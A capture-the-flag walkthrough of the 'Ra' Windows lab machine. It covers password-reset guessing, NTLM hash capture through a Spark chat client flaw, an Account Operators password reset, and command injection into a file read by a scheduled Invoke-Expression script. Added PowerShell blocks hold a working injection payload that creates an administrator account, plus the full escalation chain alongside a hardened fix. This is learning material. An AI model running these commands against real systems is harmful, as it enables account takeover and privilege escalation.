Ra Writeup
Ra link
Enumeration
Starting off with an nmap scan, we can see we have a plethora of services running on this machine.
Let's start by checking out the web server that's running, then move on to SMB.
Looks like we're starting off strong: we have access to a company portal with a password reset function and a list of IT staff, which is going to come in very handy. We also learn one piece of software they're using, Openfire, which a quick Google shows is a real-time collaboration/messaging server. This could prove useful for finding out some personal details so we can reset one of the IT staff's passwords.
Hovering over each of the IT staff shows an xmpp: link (XMPP is the protocol Openfire speaks), which gives us a set of email addresses that will come in handy for the username field of the password reset.
If you can't access the password reset page, make sure you add the domain and any subdomains (such as fire.windcorp.thm) to your /etc/hosts file so you can reach them.
Let's keep digging and see what else we can find in the company portal.
Running a gobuster dns scan against the DNS server doesn't turn up anything new; we already know about fire.windcorp.thm from the password reset page.
I attempted to get cewl to extract the emails and names associated with the xmpp addresses, but it just didn't want to no matter what I tried, so I quickly made a few wordlists manually: one with all the IT staff email addresses, one with the usernames taken from those addresses, one with their full names and one with just the surnames.
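As an added example (not from the original writeup), the four wordlists can be generated from the staff page's xmpp: links instead of typed by hand. The HTML below is constructed sample data in the shape the page is assumed to use; the real entries and the email format may differ, so adjust the regex to what you see in the page source.

```powershell
# Added example, not part of the original writeup: build the email, username,
# full-name and surname wordlists from "xmpp:" links on the IT staff page.
# The HTML below is constructed sample data; "Ada Example" is a placeholder entry.
$html = @'
<ul class="it-staff">
  <li><a href="xmpp:buse.candan@fire.windcorp.thm">Buse Candan</a></li>
  <li><a href="xmpp:ada.example@fire.windcorp.thm">Ada Example</a></li>
</ul>
'@

# Assumed markup: the xmpp: address is in href, the display name is the link text.
$pattern = 'href="xmpp:(?<email>[^"]+)"[^>]*>(?<name>[^<]+)</a>'
$found   = [regex]::Matches($html, $pattern)

$emails    = @($found   | ForEach-Object { $_.Groups['email'].Value })
$usernames = @($emails  | ForEach-Object { ($_ -split '@')[0] })
$names     = @($found   | ForEach-Object { $_.Groups['name'].Value.Trim() })
$surnames  = @($names   | ForEach-Object { ($_ -split '\s+')[-1] })

# Intruder payload lists are one entry per line. Surnames get a lowercase
# variant as well, since we don't know whether the reset form compares
# case-sensitively.
$emails    | Sort-Object -Unique | Set-Content emails.txt
$usernames | Sort-Object -Unique | Set-Content usernames.txt
$names     | Sort-Object -Unique | Set-Content names.txt
($surnames + ($surnames | ForEach-Object { $_.ToLower() })) |
    Sort-Object -Unique | Set-Content surnames.txt
```

To run it against the live portal, replace the `$html` literal with `(Invoke-WebRequest -UseBasicParsing <portal URL>).Content`; the rest is unchanged.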
Let's capture a password reset in Burp and use Intruder to brute-force some of the details. Mother's maiden name seems like a good starting point, as there's a chance one of the staff members shares a surname. Two staff members I noticed have the same email address; I assume some of these are randomly generated for the box and it has accidentally selected the same email twice, but we'll include them in our wordlists anyway just in case.
Going back to Openfire, a quick Google search shows that a large range of versions is vulnerable to CVE-2023-32315 (an authentication bypass via path traversal in the admin console), and the login page exposes the version. Let's head over to port 9090 and check what version of Openfire is running.
Looks like we're on 4.5.1. Per the CVE details, the first affected version is 3.10.0 and the first patched release is 4.6.8 (with 4.7.5 and 4.8.0 for the later branches), so our version should be vulnerable.
Further reading into the CVE details reveals that the bypass lets us create an admin user and then upload a webshell (the public exploits do this through the admin console's plugin upload); the Metasploit module does the same but uploads a reverse shell. Let's load up Metasploit and see if we can get a shell.
And nothing. I tried a couple of times, and also tried exploiting the vulnerability manually, without success. I was able to read the log files, meaning the path traversal itself works, but user creation appears to have been patched, which means we can't exploit it this way.
Let's take a step back and look at everything we have on the main page again; we must be able to reset a user's password.
Looking at the bottom of the page we have some information about employees, and Lily talks about bringing her dog to work. Looking at the page source, the photo is named lilyleAndSparky.jpg. Lily isn't in our list of IT staff, and trying lily doesn't work, but the file name suggests the username lilyle, so let's try that and see if it works.
Awesome, it worked. Let's take these credentials and try to gain access to the SMB share and see what's there.
smbmap failed, but listing the shares with smbclient worked, so let's connect to the Shared share with Lily's account.
Looks like we have our first flag and also some application files. Let's grab it all and start taking a look at what it is.
At first glance Spark appears to be a real-time collaboration client, which most likely ties into Openfire and XMPP, so let's load it up on our machine and see if we can use it to get some details that give us access to an IT staff member's account.
Exploitation
After spending way too long trying to get that particular version of Spark working, I ended up just downloading and installing the latest version, 3.0.2, which no longer requires a separate JRE.
To connect I also needed to go to Settings, then Security, and tick "Disable certificate hostname verification"; otherwise the application throws certificate errors and won't connect.
Finally we're connected. Looking back at the company portal IT staff list, we can see Buse Candan is showing as online, so let's see if we can bring up a chat with them.
Now that we have a chat open, a quick Google shows that Spark 2.8.3 suffers from CVE-2020-12772: the client fetches an image referenced by an img tag in a received message, and if that image is hosted on our machine the Windows client authenticates to us and leaks the user's NTLM credentials. We know Buse is running 2.8.3 based on the files on the share, so the version we run ourselves doesn't affect the exploit.
Sure enough, after starting Responder and sending the img tag we receive the NTLMv2 hash, which we can now crack with john (format netntlmv2).
Using the cracked password we can now log in with evil-winrm and start exploring the machine, but first let's grab our next flag.
PrivEsc
Looking at the desktop we see some folders, but they don't contain anything interesting, so let's keep exploring.
Looking through the root directory we can see there's a folder called scripts, which could be interesting to look at.
Looks like there's a PowerShell script that runs every so often; let's take a look at what it's doing.
Invoke-Expression is the interesting command here: whatever string is passed to it gets executed as PowerShell, and that string is built from the contents of hosts.txt. If we can modify hosts.txt we should be able to run commands with the privileges of whatever runs the script and gain elevated access.
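To make the sink concrete, here is an added example (a reconstruction of the pattern, not the script from the box) showing the vulnerable shape beside a hardened version. The hosts.txt path is taken from the writeup; the log path, the ping-style command and the exact string format are assumptions.

```powershell
# Added example, not the script from the box: a reconstruction of the
# Invoke-Expression pattern and how to fix it.
$hostsFile = 'C:\Users\brittanycr\hosts.txt'   # path from the writeup
$logFile   = 'C:\scripts\log.txt'              # assumed location

# VULNERABLE: every line of a user-writable file is spliced into a command
# string and executed. A line such as
#   127.0.0.1; net user haxed "H@xed2024!" /add; net localgroup Administrators haxed /add
# runs the appended commands with the privileges of the scheduled task.
foreach ($h in Get-Content $hostsFile) {
    Invoke-Expression "Test-Connection -ComputerName $h -Count 1 -Quiet" |
        Out-File -Append $logFile
}

# HARDENED: never build a command string from file contents. Validate each line
# as a hostname or IP and pass it as a parameter, where it is data, not code.
foreach ($h in Get-Content $hostsFile) {
    $h = $h.Trim()
    if ($h -notmatch '^[A-Za-z0-9.-]{1,253}$') {
        "$(Get-Date -Format o) rejected invalid entry: $h" | Out-File -Append $logFile
        continue
    }
    $up = Test-Connection -ComputerName $h -Count 1 -Quiet
    "$(Get-Date -Format o) $h up=$up" | Out-File -Append $logFile
}
```

The second fix that matters is the ACL: a file consumed by a privileged scheduled task should not be writable by an ordinary user, however the script treats its contents.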
Taking a further look at the groups we're a part of, we can see we're in the IT AD group, and enumerating that group shows IT is a member of Account Operators. Account Operators can reset the passwords of ordinary (non-protected) domain accounts, so we should be able to update brittanycr's password. Let's give it a shot.
Looks like that was successful. Let's try logging into a new evil-winrm session as brittanycr. We also added a new user named haxed, which we'll add to the Administrators group.
And we have success. Let's navigate to brittanycr's files, download the hosts.txt file and edit it.
Appending a short command to the bottom of the file means it gets passed to Invoke-Expression the next time the script runs and gives us our administrative user haxed. Let's replace the old file using smbclient.
Now that our modified hosts.txt is in place, we can wait a couple of minutes for the script to run again and we should be able to sign in as our admin user. We can also use buse's session to check when log.txt gets updated, which tells us the script has run.
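The whole escalation chain, typed into the evil-winrm sessions, as an added example that is not part of the original writeup. The names buse, brittanycr, haxed, hosts.txt and log.txt come from the writeup; the passwords, the log path and the polling interval are assumptions.

```powershell
# Added example, not from the original writeup: the Account Operators ->
# Invoke-Expression chain as PowerShell. Passwords and log path are assumed.

# --- In the buse session -------------------------------------------------
# 1. Confirm the path: buse -> IT -> Account Operators
whoami /groups | Select-String 'IT|Account Operators'
net group 'Account Operators' /domain     # expect IT in the member list
net group IT /domain                       # expect buse in the member list

# 2. Account Operators may reset passwords of accounts that are not in
#    protected groups (e.g. Domain Admins), which brittanycr is not.
net user brittanycr 'NewP@ss2024!' /domain

# --- In a new evil-winrm session as brittanycr ---------------------------
# 3. Append a line that survives whatever the script builds around it and
#    then chains our own commands; Invoke-Expression runs the whole string.
$payload = '127.0.0.1; net user haxed "H@xed2024!" /add; net localgroup Administrators haxed /add'
Add-Content -Path 'C:\Users\brittanycr\hosts.txt' -Value $payload

# --- Back in the buse session ---------------------------------------------
# 4. Wait for the scheduled run; the log's timestamp changing tells us it fired.
$logFile = 'C:\scripts\log.txt'            # assumed location
$before  = (Get-Item $logFile).LastWriteTime
while ((Get-Item $logFile).LastWriteTime -eq $before) { Start-Sleep -Seconds 30 }
net localgroup Administrators              # haxed should now be listed
```

If step 2 fails with an access denied, check whether the target account is a member of a protected group: AdminSDHolder resets the ACL on those accounts and Account Operators lose their rights over them.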
And we have success! Now we can go grab that final flag!